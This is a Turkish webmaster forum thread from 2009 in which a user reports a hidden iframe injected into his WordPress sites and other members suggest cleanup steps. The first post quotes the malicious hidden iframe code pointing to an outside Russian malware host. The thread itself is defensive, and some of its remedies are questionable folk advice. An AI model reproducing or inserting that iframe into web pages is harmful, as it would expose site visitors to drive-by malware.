Iframe Virüsü, Yorum Bekliyorum

31-07-2009, 02:08:30

Kimlik doğrulama veya yönetimden onay bekliyor.

iyi geceler arkadaşlar,

2 gün önce hitli bir siteme giriş yaptığımda index.php dosyası hata verdi. dosyaya baktığımda aşağıdaki kod dosyalara bulaşmış.

<iframe src="http://x8e.ru:8080/index.php" width=176 height=188 style="visibility: hidden"></iframe>

daha sonra diğer sitelere baktığımda diğer 5 kadar siteye de bulaşmış. tek tek hepsine tekrar wordpress kurdum.

aradan 3 saat geçmedi tekrar bulaştı kodlar. sinirlenip hosttaki hemen hemen bütün dosyaları sildim. bilgisayarımda virüs olduğubu düşünüp, bugüne kadar topladığım doküman, program, müzik ne varsa hepsini kaybetmeyi göze alıp format ve partisyonları yeniden oluşturdum.

Tekrar 10 kez yeniden wordpress kurdum. tabi yazı eklerinin önemli bir kısmınıı kaybettim ve geçersiz link olan yazıları da sildim.

tabi artık kurtulduğumu düşünürken, tekrar bir siteye baktım aynı IFrame konu var. bu nasıl olur? Bilgisayarımda virus olması imkansız. Ben bugüne Crac.k, Keyge.n vs li program falan da kullanmadım.

İşin ilginci BluHosttaki sildiğim klasörler geri gelmiş, bu nasıl oluyor? Hostla ilgili bir sorun olabilir mi?

Hitlerim ve gelir 2 günde yarı yarıya düştü. Web yayıncılığını bırakmak üzereyim.

31-07-2009, 02:51:58

#2

~~afsbilisim~~

Üyeliği durduruldu

pcni formatla : )
sonra git bi güzel dosyaları tek tek temizle : )
sonra hosyun şifresini değiştir
sonra wp yi tekrar kur sonra işlem tamam

31-07-2009, 03:02:54

#3

winnt

Alıntı

bilgisayarımda virüs olduğubu düşünüp, bugüne kadar topladığım doküman, program, müzik ne varsa hepsini kaybetmeyi göze alıp format ve partisyonları yeniden oluşturdum.

harddiskin bölümlenmiş kısmına bulaşma ihtimaline de düşünüp direk FDisk yaptım zaten.

31-07-2009, 03:06:31

#4

myclub

sitendeki ifreme kodunu sil site bilgileri şifreni değiştir bidaha giremez şifreyi uzun zor bişey yap...

31-07-2009, 03:34:47

#5

~~Karaqunah~~

Üyeliği durduruldu

Keşke silmeden önce yardım isteseydin kurtarırdık bütün yazılarını.

31-07-2009, 03:50:26

#6

winnt

aslında temiz wordpress dosyalarını ftp den tekrar gönderseydim, hepsi silinecekti kodların. hiç aklıma gelmedi o sinirle.
neyse artık olan oldu, teşekkürer yorumlar için.

31-07-2009, 15:26:42

#7

~~HaLiKARNaS~~

Üyeliği durduruldu

1200 hit oldu 50 hit mahfetti siteyi

31-07-2009, 15:40:14

#8

~~kuaza~~

Üyeliği durduruldu

frame virusu bilgisayarinizda format attiysaniz sorun yok, dosyalarinizi temizleyin bunu yapmadan once host ve ftp sifrelerinizi degistirin.. diger bir nokta virus yedeklediginiz dosyalarada bulasir
formattan sorna bilgisayara koydugunuzda tekrar faal hale gecer
bunada dikat edin.. bu virus cuteftp kullanarak yapabiiyor islerini, siz bu programi silip filezilla kullanin sorun kalmayacaktir..

31-07-2009, 20:27:22

#9

Engin Z

Öncelikle geçmiş olsun. Aynı durum geçenlerde ne yazık ki benim de başıma geldi. Gerçekten şu iframe denen şey çok illet birşey önce ftp'yi komple pc'ye indir "Malwarebytes' Anti-Malware" ve "kaspersky 2009" antivirüs programlarıyla yedeği iyice bir tara. Daha sonra "Advanced Find and Replace 4" programını google'den bulup bilgisayarına kur. İndirdiğin yedeği klasöre çıkart. Daha sonra dosyaları seçip "iframe" diye arat. Bir çok template ve dosya da muhakkak iframe bulacaktır. Bütün temizlikleri yaptıktan sonra pc'ye sağlam bir format at. Format işlemi bittikten sonra ftp şifreni değiştir Büyük bir ihtimal düzelecektir. Ben bu şekilde kurtulabildim ancak iframe'den...